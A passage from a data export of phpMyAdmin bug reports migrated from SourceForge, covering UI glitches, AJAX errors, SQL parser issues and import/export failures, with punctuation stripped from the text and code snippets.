Login page after timeout has address other than index.php in my situation sql.php) = gt; browsers password managers do not work with it because password was saved for index.php) Can you add redirection on auto logout to index.php?
thank you.
Original URL https sourceforge.net p phpmyadmin bugs 3346 Original author sailormax Found in version 3.4.7","bug"
"24444","9739","SQL parser breaks AJAX requests.
It s hard to find a useful case for explaining how to reproduce this, but the SQL parser has a call to a function that contains an echo statement, which breaks AJAX requests.
At line 362 of file sqlparser.lib.php if class exists PMA Message )) \{ PMA Message notice Automatically appended backtick to the end of query! ))
gt;display ); \} this code should be if class exists PMA Message ) GLOBALS[ is ajax request ] != true) \{ PMA Message notice Automatically appended backtick to the end of query! ))
gt;display ); \} Original URL https sourceforge.net p phpmyadmin bugs 3349 Original author roccivic Found in version 3.4.2","bug"
"24444","9740","Invalid escape sequence in SQL parser.
The SQL parser thinks that a backslash followed by a backtick is an escaped backtick.
This is not true, there is no such escape sequence, so the SQL parser should treat this sequence literally.
Please see attached screenshot for an example of where this problem manifests itself.
Original URL https sourceforge.net p phpmyadmin bugs 3351 Original author roccivic Found in version 3.4.2","bug"
"24444","9741","inline edit changes are not saved.
When using the inline edit function to change data in a field, the changes are not saved after pushing the save button.
PHPMyAdmin v 3.4.2 Linux kernel 2.6.18 238.12.1.el5 Redhat CentOS release 5.6 Final) PHP 5.3.5 cli) built Mar 9 2011 08 02 23) MySQL DB 5.2.10 Original URL https sourceforge.net p phpmyadmin bugs 3352 Original author anonymous Found in version 3.4.2","bug"
"24444","9742","Blank Table entries not being deleted using CheckAll.
Consider a table containing some number of entries along with more than one BLANK entry all columns data is null ) and when we click on Check All and click delete, All the filled entries are deleted but only one blank entry is deleted and other blank entries remain in the table.So only one blank entry is deleted at a time even if we select Check All and delete.
PhpMyAdmin Version information 3.5.0 rc1 Web Server Apache 2.2.17 Win32) mod ssl 2.2.17 OpenSSL 0.9.8o PHP 5.3.4 mod perl 2.0.4 Perl v5.10.1 Database client version libmysql mysqlnd 5.0.7 dev 091210 Revision 304625 PHP extension mysqli Database Server Server localhost via TCP IP Software MySQL Software version 5.5.8 MySQL Community Server GPL) Protocol version 10 User root localhost Server charset UTF 8 Unicode utf8) Original URL https sourceforge.net p phpmyadmin bugs 3529 Original author abhishekp91 Found in version 3.5.0","bug"
"24444","9743","CSP causing designer JS buttons to fail.
Everything was setup correctly, and seemed to work.
When attempting to use designer, the javascript buttons would not operate.
No visible errors, thye jsut did nothing.
Checking the firefox error console showed Warning CSP Directive allow lt;my phpmyadmin url gt; violated by javascript Start relation ); A little searching about what CSP was led me to https developer.mozilla.org en Security CSP Using Content Security Policy.
Reading that page i found info about this header entry X Content Security Policy.
Searching phpmyadmin pages for that i found it in \libraries\header http.inc.php.
Commenting out that line made everything work.
Running phpMyAdmin 3.4.2 on server2008r2, 64bit, under apache2.2.
Original URL https sourceforge.net p phpmyadmin bugs 3354 Original author mfhfozzy Found in version 3.4.2","bug"
"24444","9744","font size selectbox isn t working.
all just like the BUG ID 3301392. but it s closed.
so i report again.
it s not a case.
my some friends has this problem too.
i think it s begin from ver 3.4. , when phpMyAdmin has new theme with pmahomme .
i test this bug in some browsers and OSs, and i tried edit the cookies pma fontsize , but nothing was change.
Original URL https sourceforge.net p phpmyadmin bugs 3355 Original author aliuwr Found in version 3.4.3","bug"
"24444","9745","Working SQL query exports error page.
The following SQL statement is valid and runs normaly, but, during the export procedure, the output file is an HTML which explains the query has an error attached).
SELECT per code, per surname, per name, sat platinum, 10 ses rank) 25 25) 100) AS mul, ses title, ses rank 6) AS bathmida FROM session all, person WHERE sat personid = per id AND year ses date) gt;=2008 AND ses panhellenic in xcex9dxcexb1xcexb9 xcfx80xcfx81xcexbfxcexbaxcfx81xcexb9xcexbcxcexb1xcfx84xcexb9xcexbaxcfx8cxcfx82 , xcex9dxcexb1xcexb9 xcexb7xcexbcxcexb9xcfx84xcexb5xcexbbxcexb9xcexbaxcfx8cxcfx82 , xcex9dxcexb1xcexb9 xcfx84xcexb5xcexbbxcexb9xcexbaxcfx8cxcfx82 ) AND ses rank between 7 and 9 AND sat platinum lt; gt; 0 Original URL https sourceforge.net p phpmyadmin bugs 3356 Original author pournaras Found in version 3.4.3","bug"
"24444","9746","Error dropping index of non existing column.
An error occurs when dropping the index of a column that doesn t exist anymore.
Solution check for related indexes before removing or renaming a column from the table structure.
MySQL 5.1.49 Original URL https sourceforge.net p phpmyadmin bugs 3357 Original author ruleant Found in version 3.4.3","bug"
"24444","9747","CREATE type SQL dumps will not reload left sidebar.
I am using Firefox 5.0 and clicking the SQL tab to paste a basic CREATE TABLE query.
The query executed successfully but the left sidebar didn t reload and show my new table.
Original URL https sourceforge.net p phpmyadmin bugs 3358 Original author danielle work Found in version 3.4.3","bug"
"24444","9748","js error in Table >Structure >Index >Edit.
When we click on Edit in Table gt;Structure gt;Index , firebug shows an js error which says Uncaught TypeError Cannot read property options of undefined .
It seems the name has been changed in Index type to index[Index type] and not compatible with the elements in indexes.js file.
The error is reproduces when we change the index type option and also by that we cannot save the changes for index, since it gives an sql error also.
Original URL https sourceforge.net p phpmyadmin bugs 3360 Original author lgtkaushalya Found in version 3.4.3","bug"
"24444","9749","Create an index on X columns form not validated.
To reproduce go to a db s structure page scroll to the the part of the page that deal with indices in the Create an index on X columns form type a value of 0 click Go expected result a javaScript warning saying that the value must be at least 1 and the form not submitted actual result no warning and the form is submitted, this is followed by a new page with no rows in the indices table Original URL https sourceforge.net p phpmyadmin bugs 3361 Original author roccivic Found in version 3.4.3","bug"
"24444","9750","Info message has error class.
go to db gt;table gt;structure gt;indexes gt;edit you will see a message PRIMARY must be the name of and only of a primary key!)
In my opinion it has the wrong class, it should be notice not error .
And also this message is not positioned properly as it is splitting the dialog in two, so the user has to move the mouse more then necessary.
I think that this message should go either at the top or at the bottom of the dialog.
Original URL https sourceforge.net p phpmyadmin bugs 3362 Original author roccivic Found in version 3.4.3","bug"
"24444","9751","Timepicker does not work in AJAX dialogs.
The jQuery timepicker sometimes does not work in AJAX dialogs.
To reproduce go to demo server 3.5.0) go to a db go to SQL tab and execute this query CREATE PROCEDURE `foo` IN `bar` DATETIME) SELECT NULL go to the Routines tab click the execute link near routine `foo` in the execution dialog click on the timepicker icon Expected result The timepicker is normally displayed and can be used to select a time Actual result The timepicker is displayed behind the AJAX dialog and cannot be used.
Now, the problem here is that the Datepicker has a z index of 1003, but the timepicker does not have a z index set at all.
So I suggest to add a z index of 1003 to the timepicker, too.
Original URL https sourceforge.net p phpmyadmin bugs 3365 Original author roccivic Found in version Latest Git","bug"
"24444","9752","cfg[ MaxRows ] not honored with LIMIT.
Steps to reproduce Go to a table which has rows more than cfg[ MaxRows ] value.
Execute a SELECT query with a LIMIT clause with the value more than cfg[ MaxRows ] eg LIMIT 0, 50 when cfg[ MaxRows ] is 30) Expected results First 30 rows of the resultant 50 rows should be displayed initially.
Actual results All 50 resultant rows are displayed with wrong info message Showing rows 0 29 50 total 1, Query took 0.0006 sec) Original URL https sourceforge.net p phpmyadmin bugs 3366 Original author madhuracj Found in version Latest Git","bug"
"24444","9753","Interface problems for queries having LIMIT clauses.
When a SELECT query having a LIMIT clause is executed, all the resultant rows are displayed.
However the following erroneous info message is displayed Showing rows 0 29 1000 total 1, Query took 0.0006 sec) Further, results navigation bar is displayed, but it has no purpose here as all rows are displayed.
Original URL https sourceforge.net p phpmyadmin bugs 3368 Original author madhuracj Found in version Latest Git","bug"
"24444","9754","database with fa in name shows incorrectly.
I have database with name fa time .
It shows kinda strange.
It s split into two halfs and it shows like two lines.
See attachment.
Original URL https sourceforge.net p phpmyadmin bugs 3369 Original author djbacons Found in version 3.3.10","bug"
"24444","9755","Table list tooltip.
It s a very small bug.
Every element from the list of tables shown in the left frame, have a tooltip that shows the number of rows i.e.
Structure 20 Rows) , Browse 20 Rows) , etc).
After clicking one of these items, the page loaded in the big frame calls a javascript function named updateTableTitle located in common.js).
This function removes the word Rows from the Tooltip.
Original URL https sourceforge.net p phpmyadmin bugs 3542 Original author kpull1 Found in version 3.4.9","bug"
"24444","9756","TABbing through a NULL field resets NULL.
phpmyadmin 3.4.3.1 1) Set up the test table create table `test` `col1` datetime not null, `col2` datetime null, `col3` datetime not null) insert into `test` values 0, NULL, 0) 2) browse table test 3) Click on the inline edit icon to open that row for inline editing 4) Focus on click on) the input field for col1 .
Note that NULL checkbox on col2 is checked, 5) Press TAB a few times.As soon as the cursor leaves input field for col2 onblur), the NULL checkbox on col2 gets unchecked, even though no editing was done to that field Desired behavior TABbing through col2 should not change the state of its NULL checkbox.
Original URL https sourceforge.net p phpmyadmin bugs 3370 Original author wesha Found in version 3.4.3","bug"
"24444","9757","Error message about PRIMARY key.
When I click the edit pencil on my PRIMARY key on a simple table, a message in a red box says PRIMARY must be the name of and only of a primary key!)
Well, it is.
The PRIMARY index is defined on a column called time stamp , which is, surprisingly, a timestamp.
The index name and index type are both PRIMARY .
Nothing fancy about it.
The time stamp field is defined as CURRENT TIMESTAMP, not NULL.
Everything seems to work OK.
So what is this error message all about?
I have never attempted to create records with the same timestamp.
Using MySQL 5.5, Safari on Mac OS 10.7.3.
Original URL https sourceforge.net p phpmyadmin bugs 3544 Original author roblewis Found in version 3.4.0","bug"
"24444","9758","Again, Import csv data in 3.4.3 is not working.
I am reopening this bug because roccivic Rouslan Placella) closed the one I had opened before ID 3353996) but did not understand what the problem I m facing is.
I have no problem creating tables, my problem is importing data in csv format to a table.
I did have an error naming the file that has the data to create the table Alias), instead of naming it sql I named it csv but as I stated before my problem is not creating the table, is when I try to upload csv data into it.
It seem to me is a gess), that Mr. Rouslandid not see any of the images I uploaded and also maybe I did not make myself clear when I stated the problem.
This problem does not happens whe I do the upload in version 3.3.9.2 so I know for sure that there is a bug in version 3.4.3 I m trying to be as much clear as possible stating the problem.
I have a table Alias) that has 3 fields and it s already been created on the demo server under the database Alias which I created yesterday, hope they are still there.
If I try to make an import of a csv file into said table I get an error stating Invalid column count in CSV input on line 1.
I m uploading 7 files which show detaild information about the problem and how to recreate it.
Alias.Table.Format.sql, the Alias table format as exported by pma Alias.20110703.csv, just 3 records of data to import into the table.
PMA.Ver339.Import.Settings.png, this image shows the import settings in Pma.3.3.9.2 PMA.Ver339.Import.Results.png, this image shows the correct) import results in Pma.3.3.9.2 PMA.Ver3431.Import.Settings.png, this image shows the import settings in Pma.3.4.3.1 PMA.Ver3431.Import.Results.png, this image shows the wrong) import results in Pma.3.4.3.1 ErrorOnDemoServer.png, this image shows the veri same wrong) results when I did the import using the demo server.
One more thing about me.
I have been using PMA for more than 6 years.
I am also an experienced programmer in Php 10 years) so I DO KNOW what I m doing and I have made no erroes as Mr, Rouslan Placella implied when closing the bug I had openned before.
Also I have a background of 30 years of experience in IT so, when I report something I do it after a lot of trying and been exteamly sure the the error exists and not that I m doing something wrong.
Also I have not been able to replay the files ogv) named in his response, I don t have the slightest idea of what they are nor I have tie to play and try to find out a player to open them.
I hope that this time you have the patience to read and see the images I am attaching.
There is an error when importing csv files in version 3,4,3,1.
Original URL https sourceforge.net p phpmyadmin bugs 3371 Original author yacar suscri Found in version 3.4.3","bug"
"24444","9759","Suhosin blacklisted functions.
When you got a function used by phpmyadmin on the suhosin blacklist, phpmyadmin will just show a blank page and nothing will be logged to the error log.
I got this problem with the function apache note as used in logging.lib.php.
A solution would be to use something like below instead of the function exists function suhosin function exists func) \{ if extension loaded suhosin )) \{ suhosin = ini get suhosin.executor.func.blacklist ); if empty suhosin) == false) \{ suhosin = explode , , suhosin); suhosin = array map trim , suhosin); suhosin = array map strtolower , suhosin); return function exists func) == true array search func, suhosin) === false); \} \} return function exists func); \} by webmaster at mamo net dot de 22 Sep 2007 12 43 at http php.net manual en function.function exists.php) Original URL https sourceforge.net p phpmyadmin bugs 3372 Original author joolee Found in version 2.11.9","bug"
"24444","9760","DROP does not work on defective VIEWs.
This is the same bug reported in bug 1764195, but still exists.
If a table is modified or dropped, which makes the view defective, the view cannot be dropped using the DROP TABLE command, which the interface generates.
A defective view can only be dropped using the DROP VIEW command in the SQL tab.
The interface should use DROP TABLE for tables and DROP VIEW for views instead of DROP TABLE for both.
Additional info A defective view shows in use in the table list under the Records, Type, Collation, Size, and Overhead columns.
If the table and non defective view are dropped at the same time using checkboxes and With selected DROP ), the view is dropped successfully using DROP TABLES).
If the DROP button red X) is used on the defective view, a NOTICE of 1051 Unknown table lt;view name gt; is generated using DROP TABLE).
If the With selected DROP option is used on the defective view, an ERROR of 1051 Unknown table lt;view name gt; is generated using DROP TABLE).
Configuration phpMyAdmin 3.4.5 PHP 5.3.10 MySQL 5.1.61 Original URL https sourceforge.net p phpmyadmin bugs 3551 Original author mongo02 Found in version 3.4.5","bug"
"24444","9761","Missing Server Parameter on inline sql query.
The hidden input server from the querywindow.php is missing in the inline sql query.
Therefor if i execute an sql with the inline query box in the Main Window.
The SQL always trys to execute this on the first server that is configured.
Reproduce Manage at least 2 Servers with one Installation.
Login on second server and execute a simple sql.
Then click on the inline link in the above box where the current query is shown.
Change the Query or just click on the OK button.
You will be logout because no server parameter is given via GET or POST If you first logon at the first server and then switch to the second server and then doing the steps above, phpmyadmin trys to execute the sql on the first server because you are already loged in.
Sorry if that is reported anywhere else.
I could not find anything with the search function Original URL https sourceforge.net p phpmyadmin bugs 3374 Original author dj marty Found in version 3.4.3","bug"
"24444","9762","Missing image extension.
See https github.com phpmyadmin phpmyadmin pull 24 Original URL https sourceforge.net p phpmyadmin bugs 3553 Original author lem9 Found in version 3.5.0","bug"
"24444","9763","drop field > lost active table.
after drop field, phpMyAdmin lost active table.
If you want continue work with table, you need search it in the list and activate again...
Original URL https sourceforge.net p phpmyadmin bugs 3376 Original author sailormax Found in version 3.4.3","bug"
"24444","9764","Missing Generate Password button.
When cfg[ AjaxEnable ] = false; and JavaScript is enabled in the browser, the Generate Password button is not created in privilege related forms.
To reproduce disable AJAX in PMA, but ensure that JavaScript is still turned ON 1 Click Change password on main page gt; the page you go to is missing the Generate Password button 2 Go to main page gt; go to Privileges tab gt; click Add a new user gt; the page you go to is missing the Generate Password button 3 Go to main page gt; go to Privileges tab gt; click Edit privileges for some user gt; the page you go to is missing the Generate Password button This is not the expected behaviour.
Original URL https sourceforge.net p phpmyadmin bugs 3377 Original author roccivic Found in version 3.4.3","bug"
"24444","9765","Chart grouping incorrect.
If i wannt to show a graph of an given SQL response the grouping seems to be incorrect.
Original URL https sourceforge.net p phpmyadmin bugs 3556 Original author anonymous Found in version 3.5.0","bug"
"24444","9766","Fatal error Call to undefined function json encode ).
I was trying to create a new table with phpMyAdmin, and when I clicked on Execute , a little dialog appeared to ask me to wait and disappeared without changing the page.
The table has not been created.
The AJAX script from phpmyadmin tbl create.php?db=...) fails because an error occurs on tbl create.php?...)
lt;br gt; lt;b gt;Fatal error lt; b gt; Call to undefined function json encode ) in lt;b gt; usr share webapps phpMyAdmin libraries common.lib.php lt; b gt; on line lt;b gt;2957 lt; b gt; lt;br gt; this is the response of the AJAX request) Here is my config, as shown in phpMyAdmins homepage phpMyAdmin Version 3.4.3.1 Version du serveur 5.5.14 log Version du protocole 10 Utilisateur root localhost Jeu de caractxc3xa8res pour MySQL UTF 8 Unicode utf8) Apache 2.2.19 Unix) mod ssl 2.2.19 OpenSSL 1.0.0d DAV 2 Version du client MySQL mysqlnd 5.0.8 dev 20102224 Revision 308673 Extension PHP mysql Original URL https sourceforge.net p phpmyadmin bugs 3378 Original author anonymous Found in version 3.4.3","bug"
"24444","9767","Displays the wrong number of results..
When executing query using big limit statement e.g.
select from table limit 0, 100) in notice message I see Showing rows 0 29 100 total, Query took 0.0492 sec) and all 100 rows in results table.
Original URL https sourceforge.net p phpmyadmin bugs 3379 Original author popsul Found in version 3.4.3","bug"
"24444","9768","config.inc.php is world writable on an NTFS drive in Linux.
Steps to reproduce Use a Linux OS e.g.
Ubuntu) with Apache s htdocs folder hosted on an NTFS drive Unzip phpMyAdmin in that folder, and create a configuration file config.inc.php) Invoke phpMyAdmin in the browser.
You get the error Wrong permissions on configuration file, should not be world writable!
I looked at the code and identified the problem as this The function checkPermissions ) in Config.class.php verifies that the file config.inc.php is not world writable, unless the OS is Windows.
This causes an issue if phpMyAdmin is hosted in Linux, but on an NTFS drive all files hosted on an NTFS drive have permissions 777 and cannot be changed to anything else, yet the OS is not Windows.
In consequence, phpMyAdmin refuses to work.
There is no way to relax that condition through a configuration parameter, I had to comment out that check in the code to have PMA work again.
Original URL https sourceforge.net p phpmyadmin bugs 3558 Original author sylvainjambon","bug"
"24444","9769","Incorrect parameter.
An URL in this text is not displayed correctly, because the call has an incorrect parameter.
See below for the fix diff rbB phpMyAdmin 3.4.3.1 all languages setup lib index.lib.php .. phpMyAdmin 3.4.3.1 all languages setup lib index.lib.php 267c267 lt; strSecurityInfoMsg = sprintf strSecurityInfoMsg, [a ?page=servers amp;amp;mode=edit amp;amp;id= 1 d tab Server config] , [ a] , [a ?page=form amp;amp;formset=Features tab Security] , s ); gt; strSecurityInfoMsg = sprintf strSecurityInfoMsg, [a ?page=servers amp;amp;mode=edit amp;amp;id= 1 d tab Server config] , [ a] , [a ?page=form amp;amp;formset=Features tab Security] , [ a] ); Original URL https sourceforge.net p phpmyadmin bugs 3380 Original author joergent Found in version 3.4.3","bug"
"24444","9770","Backquotes in normal text on import page.
phpMyAdmin 3.4.3.1 shows backquotes in normal text on import page with ajax but no progressbar.
Looks strange.
You can pull a fix from git github.com csware phpmyadmin.git backquotes fix Original URL https sourceforge.net p phpmyadmin bugs 3381 Original author csware Found in version 3.4.3","bug"
"24444","9771","Header links except More hide after closing dlg.
All header bar links except for the More hide after closing the Create table jQuery UI dialog, if the window size has been changed while the dialog was open.
Original URL https sourceforge.net p phpmyadmin bugs 3562 Original author mynetx Found in version 3.5.0","bug"
"24444","9772","PMA showHint with bbcode=true in display tbl.lib.
This fixes an issue with an InnoDB table on sql.php with select from tbl showing that total N lt;sup gt;1 lt; sup gt; rows are displayed and with a JavaScript enabled browser the footnote gets hidden and it s impossible to find out what the lt;sup gt;1 lt; sup gt; means.
You can pull my fix from git github.com csware phpmyadmin.git fix footnote Original URL https sourceforge.net p phpmyadmin bugs 3382 Original author csware Found in version Latest Git","bug"
"24444","9773","Missing value in the form!
IE 9).
When I take the SQL output from a query generated on one server and try to run it in the SQL window on another server I now get a popup window which says Missing value in the form!!.
When I do the same thing in version 3.4.9 or any previous version) it works as expected.
Original URL https sourceforge.net p phpmyadmin bugs 3564 Original author tonymarston Found in version 3.5.0","bug"
"24444","9774","Comment on a column breaks inline editing.
Firefox 5.0 1) execute SQL create database `test`; use `test`; CREATE TABLE `test` `a` int 1) COMMENT comment , `b` int 1) ); insert into `test` values 1, 2); 2) browse table `test`.
Click on inline edit button for the row.
3) Change the value 1 to 3 4) Click save button, get error UPDATE `test` SET `a comment` = 12 WHERE `test`.`a` =1 AND `test`.`b` =2 LIMIT 1 MySQL said Documentation 1054 Unknown column a comment in field list Original URL https sourceforge.net p phpmyadmin bugs 3383 Original author wesha Found in version 3.4.3","bug"
"24444","9775","Errors Generated on Data Export.
When attempting to do a DB export through PHPMyAdmin the following error is being generated CSV Export) Fatal error Cannot redeclare pma exportcomment ) previously declared in D \inetpub\phpMyAdmin\libraries\export\htmlexcel.php 16) in D \inetpub\phpMyAdmin\libraries\export\csv.php on line 42 The error differs dependant on the different type of exports SQL Export) Fatal error Cannot redeclare pma exportcomment ) previously declared in D \inetpub\phpMyAdmin\libraries\export\htmlexcel.php 16) in D \inetpub\phpMyAdmin\libraries\export\sql.php on line 252 Export type is set as quick.
This is replicable on all databases and tables MySQL Version 5.1.49 community Logged on as root Web Server IIS7 phpMyAdmin version 3.4.3.1 Cheers.
Original URL https sourceforge.net p phpmyadmin bugs 3384 Original author liamb Found in version 3.4.3","bug"
"24444","9776","Page list in navigation frame looks odd.
Please see the attached screenshot.
This only happens with the pmahomme theme with Light Navigation.
Original URL https sourceforge.net p phpmyadmin bugs 3385 Original author roccivic Found in version 3.4.3","bug"
"24444","9777","Wrong page list in navigation frame.
When a user has selected a database in the navigation frame and is shown a list of tables, the page navigation for the databases is also shown, but it shouldn t. Please see the attached screenshot.
Only the pmahomme theme is affected.
Original URL https sourceforge.net p phpmyadmin bugs 3386 Original author roccivic Found in version 3.4.3","bug"
"24444","9778","Search in table with brackets.
Situation a table called [users] yes, with brackets in its name), containing a column username .
Reproduce the problem fill the table with some data, then try to search for a username using the search function.
Result extra instance of the menu bar is displayed, no search results shown even if there are matches in the database Original URL https sourceforge.net p phpmyadmin bugs 3570 Original author anonymous Found in version 3.5.0","bug"
"24444","9779","2d charts.
Convert the charts to 2d charts.
One only uses 3d charts to fake statistiks.
;) Original URL https sourceforge.net p phpmyadmin bugs 3387 Original author csware Found in version Latest Git","bug"
"24444","9780","Lion Safari Resume problems?.
Since upgrading to Mac OS X 10.7 Lion , I ve been having lots of problems with phpMyAdmin in Safari.
When running queries, I frequently get import.php Missing parameter import type import.php Missing parameter format In addition,when editing a record it often presents a blank insert page i.e.
empty text boxes), instead of filling it with the current record.
I suspect that it is related to the new application resume feature in Lion.
Mac OS X 10.7 Build 11A511 Safari 5.1 7534.48.3) phpMyAdmin 3.4.3.1 Original URL https sourceforge.net p phpmyadmin bugs 3388 Original author mralston Found in version 3.4.3","bug"
"24444","9781","export procedures.
CREATE PROCEDURE FUNCTION EVENT option on SQL export is missleading it means export all proceduires, ...
It would also be nice if one could select the functions procedures to export Original URL https sourceforge.net p phpmyadmin bugs 3390 Original author csware Found in version 2.11.9","bug"
"24444","9782","Cannot execute saved query.
I click on SQL tab on a table, on the bottom select saved query, select display query and I click proceed.
Now I change the query and press the Proceed Execute) button below the query.
Now instead of executing the query it loads the query from the database again.
I pressed the first submit not the second one.
It should execute the query not load it again.
Original URL https sourceforge.net p phpmyadmin bugs 3391 Original author freeman3 Found in version 3.4.3","bug"
"24444","9783","Column comments are not displayed.
Column comments are not displayed in the 3.5.0 dev.
They re not shown anywhere not even when editing).
However, when editing we replace the previous comment and the new comment is saved.
I used show create table and checked the comments are being updated; they re just not being shown in pMA s interface.
Error was reproduced with MySQL 5.5 but also in the online demo of 3.5.0 dev which runs MySQL 5.1 so that s a pMA problem not mySQL s. Original URL https sourceforge.net p phpmyadmin bugs 3392 Original author leods92 Found in version Latest Git","bug"
"24444","9784","Problems regarding ShowTooltipAliasTB.
Hello, I m not sure whether this really qualifies as a bug as much as needs improvement , but I didn t think Feature Requests was the place for it either.
The IRC user faraway came reporting some trouble using ShowTooltipAliasTB, and after some testing I could confirm that the feature isn t working as I would expect.
Note that ShowTooltipAliasDB works exactly as I would expect.
1) According to Documentation.html, this can be set to a boolean or string value.
However, cfg[ ShowTooltipAliasTB ] = true; doesn t seem to work.
cfg[ ShowTooltipAliasTB ] = true ; does, but that would mean the documentation is wrong.
I propose modifying the code to detect the boolean value here and act appropriately rather than forcing the string value of true ).
2) Once the feature is actually enabled, it still doesn t work exactly as expected.
From the docs Same as cfg[ ShowTooltipAliasTB ], except this works for table names however, in the navigation frame the table names remain.
Viewing the Structure of a database uses the comment as the table name, but again this doesn t match the behavior of ShowTooltipAliasDB where clicking the Databases tab of the main page uses the literal database name and the navigation frame uses the comment roughly the opposite behavior of ShowTooltipAliasTB).
So I propose a) making ShowTooltipAliasTB show the comment in the navigation frame and b) making ShowTooltipAliasDB show the comment in the Databases tab this creates potential problems in fringe cases like Privileges , but that doesn t bother me much).
This way the two similar features act more similarly.
Thanks!
Original URL https sourceforge.net p phpmyadmin bugs 3393 Original author ibennetch Found in version Latest Git","bug"
"24444","9785","Transformations for text plain on a BLOB column.
When I have a field with Type BLOB, I add MIME type = text plain and Transformation = text plain substr , but when I browse the table, it shows [BLOB nnnB] in place of the text value.
I tested this with several versions including the latest one 2012 04 23).
I think it should modify the file libraries display tbl.lib.php, replacing the line about 2746 in the latest relase) if strpos transform function, octetstream )) \{ by if strpos transform function, octetstream ) || strpos transform function, text )) \{ Thanks Original URL https sourceforge.net p phpmyadmin bugs 3578 Original author jrschlosser Found in version Latest Git snapshot","bug"
"24444","9786","Missing spaces.
Missing spaces in server status.php in output, before line 920. pull git github.com csware phpmyadmin.git missing space Original URL https sourceforge.net p phpmyadmin bugs 3394 Original author csware Found in version Latest Git","bug"
"24444","9787","column reorder patch breaks selections of text.
The column reorder patch breaks or complicates the selection the text of a column in FF5, especially for smaller) id columns.
Original URL https sourceforge.net p phpmyadmin bugs 3395 Original author csware Found in version Latest Git","bug"
"24444","9788","Group Order query displays wrong result with large dataset.
I ran this query on a table with around 211,000 rows.
The table is basically a mapping of X s to Y s. SELECT xid, count yid) AS tot FROM x y map WHERE z=11 GROUP BY xid ORDER BY tot DESC Without the ORDER BY the query runs fine and returns each X with their Y count, but at the top it says Showing rows 0 0 1 total, Query took 0.0003 sec) .
With the ORDER BY phpmyadmin just returns one row 0 36503.
Removing the z=11 bit also returns the correct results.
Incidentally, z=11 account for 36k of the 211k rows.)
If I run the query through PHP s mysql query I get the correct results, so the query is correct and PHP MySQL are working fine.
PHPMyAdmin is either running a different query or messing up the results display.
VERSION INFO Server Localhost via UNIX socket Server version 5.1.41 3ubuntu12.10 phpMyAdmin 3.4.3.2 MySQL 5.1.41 PHP 5.3.5 Original URL https sourceforge.net p phpmyadmin bugs 3396 Original author anonymous Found in version 3.4.3","bug"
"24444","9789","userconfig table for pmadb marked as invalid after new setup.
hello i ve setup phpmyadmin on windows.
after creating the pma database and tables i executed both the create and udate sql scripts, no errors) after login the userconfig table is marked as invalid, but no detailed information is given cfg[ Servers ][ i][ userconfig ] ... not OK [ Documentation ] User preferences Disabled the other tables are all ok. used versions Server localhost localhost via TCP IP) Server version 5.5.15 Protocol version 10 MySQL charset UTF 8 Unicode utf8) Web server Apache 2.2.19 Win32) mod fcgid 2.3.6 MySQL client version mysqlnd 5.0.8 dev 20102224 Revision 308673 PHP extension mysqli Documentation phpMyAdmin Version information 3.4.3.2, latest stable version 3.4.3.2 Original URL https sourceforge.net p phpmyadmin bugs 3397 Original author anonymous Found in version 3.4.3","bug"
"24444","9790","Missing validation in Ajax mode.
When you write 30. in the session max rows input, phpmyadmin will not be able to display any more results.
The session spanish message error is La conexixc3xb3n para controluser, como estxc3xa1 definida en su configuracixc3xb3n, fracasxc3xb3.
and 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 30. at line 2 .
When you logout the problem is solved, because the value is saved in the session.
Original URL https sourceforge.net p phpmyadmin bugs 3583 Original author anonymous Found in version 3.4.5","bug"
"24444","9791","Variable character set client can t be set.
OS Windows XP PHP 5.2.17 MySQL 5.1.54 PHPmyAdmin 3.4.3.1 Export now contain the following lines at the end !40101 SET CHARACTER SET CLIENT= OLD CHARACTER SET CLIENT ; !40101 SET CHARACTER SET RESULTS= OLD CHARACTER SET RESULTS ; !40101 SET COLLATION CONNECTION= OLD COLLATION CONNECTION ; This is OK if there was an old value to save, but I am now getting this error 1231 Variable character set client can t be set to the value of NULL Original URL https sourceforge.net p phpmyadmin bugs 3398 Original author tonymarston Found in version 3.4.3","bug"
"24444","9792","Impossible d xc3xa9ditier certains records.
Bonjour, Je suis en debian 6, j ai testxc3xa9 toutes les versions de phpMyAdmin, j ai toujours un bug.
Lorsque je veux xc3xa9diter une ligne, il me donne le formulaire d insertion ... Vous savez d ou ca pourrait venir ?
Les records que je ne sais pas xc3xa9diter sont avec un user id 24,25, 28 par exemple) Merci pour votre aide Philippe Original URL https sourceforge.net p phpmyadmin bugs 3399 Original author anonymous","bug"
"24444","9793","Notification message if PRIMARY KEY does not exist.
Hi, concerning the deleted bug 624025, could it be possible to display a notification message to the user?
Something like You should define a PRIMARY KEY before to edit or delete an entry .
I think the actual behavior is pretty confusing, what do you think about it?
Original URL https sourceforge.net p phpmyadmin bugs 3400 Original author yannkechichian","bug"
"24444","9794","Documentation of [VARIABLE] is unclear.
Documentation of the [VARIABLE] feature in bookmarked queries can be confusing to someone not well versed in SQL.
I eventually figured it out, but the important missing bit of information was this The string that starts with and ends with is actually an SQL comment, and the query you are creating must be valid and error free with this string completely removed.
I know the current documentation suggests this, but I found the explanation very unclear.
Original URL https sourceforge.net p phpmyadmin bugs 3590 Original author roblewis Found in version 3.5.0","bug"
"24444","9795","The table title is displayed incorrectly.
More in detail in a attached file.
Original URL https sourceforge.net p phpmyadmin bugs 3401 Original author adm it Found in version 3.4.2","bug"
"24444","9796","configuring LeftFrameTableSeparator and the docs.
The LeftFrameTableSeparator is support both string and array format, when edit the config.inc.php manually to an array, pma can display correct in left frame, but the setup script can t hold array, it said Warning htmlspecialchars ) expects parameter 1 to be string, array given in F \wwwroot\phpMyAdmin\libraries\config\FormDisplay.tpl.php on line 180 and also in the doc only said the format is string, not mention the array format Original URL https sourceforge.net p phpmyadmin bugs 3402 Original author rimyxp Found in version Latest Git","bug"
"24444","9797","left frame does not load on drop down change in chrome.
phpMyAdmin version 3.4.1 Browser Google Chrome 13.0.782.112 m have noticed on many older versions too) When trying to select a database from the drop down list in the left frame nothing happens except a javascript error; Uncaught TypeError Cannot read property document of undefined which is shown to occur in common.js line 2 mainly and also sometimes 7 I will get another instance of this each time i try and select another database).
I ve noticed this has been a problem in google chrome for quite a while in various different versions of the browser and phpMyAdmin.
I ve never had problems with other browsers so I m thinking it may be a bug in chrome, but it does seem odd that other drop down boxes do reload change things without errors in other areas of phpMyAdmin.
Original URL https sourceforge.net p phpmyadmin bugs 3403 Original author novocaine88 Found in version 3.4.1","bug"
"24444","9798","Fatal error with enabled PHP APC.
when you have enabled in php.ini APC phpmyadmin ends with PHP Fatal error Call to undefined function PMA log user ) in usr share phpmyadmin libraries common.inc.php on line 914.
Original URL https sourceforge.net p phpmyadmin bugs 3594 Original author anonymous Found in version 3.4.10","bug"
